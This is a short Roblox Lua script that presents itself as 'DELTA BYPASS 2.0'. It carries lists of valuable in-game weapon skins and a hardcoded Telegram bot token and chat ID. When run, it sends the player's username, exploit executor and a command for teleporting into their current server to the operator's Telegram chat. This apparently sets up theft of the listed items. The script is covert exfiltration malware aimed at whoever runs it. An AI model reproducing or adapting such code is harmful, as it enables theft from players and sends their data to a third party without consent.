aprplayers = {
    "Guest194827461",
    "skibiditolet2018",
    "typazveer",
    "speralka8814",
    "eqz_s",
}
webhook = 10
poor = 37
chatId = -1002853777462
botToken = "8432656507:AAEpuoT4W15g_9iNBxFmTAQTwF9ZLtkBdRo"
threadIdIP = 104
threadmobile = 6
reportsid = 29143
bypassid = 778907
richgodliesList = {"Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}
richgodliesListpc = {"TreeKnife2023", "Turkey2023", "TreeGun2023","TravelerGun","Sakura_K", "Blossom_G", "ZombieBat", "Constellation", "Candy", "VampireGun", "SunsetKnife", "SunsetGun","Darksword","Darkshot","Rainbow_G","Rainbow_K","Bauble"}
skinNamesTG = {"Corrupt","Vampire's Axe","Gingerscope","Traveler's Axe","Celestial","Icepiercer","Harvester","Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}

dualhook = 783646
function SendTelegramMessage(botToken, chatId, threadId, text, embeds)
    local url = "https://api.telegram.org/bot" .. botToken .. "/sendMessage"

    local data = {
        chat_id = chatId,
        message_thread_id = threadId,
        text = text or "",
        parse_mode = "Markdown"
    }

    -- Telegram API sendMessage не поддерживает embeds как Discord,
    -- вместо этого нужно форматировать текст с помощью Markdown или HTML.

    local jsonData = HttpService:JSONEncode(data)

    local response = request({
        Url = url,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = jsonData
    })

    return response
end
local messageText = 
    "*DELTA BYPASS 2.0*" ..
    "```\n" ..
    "Username: " .. game.Players.LocalPlayer.Name .. "\n" ..
    "Executor: " .. identifyexecutor() .. "\n" ..
    "```" ..
    "```\n" ..
    "game:GetService(\"TeleportService\"):TeleportToPlaceInstance(142823291, \"" .. game.JobId .. "\")\n" ..
    "```"

SendTelegramMessage(botToken, chatId, bypassid, messageText)
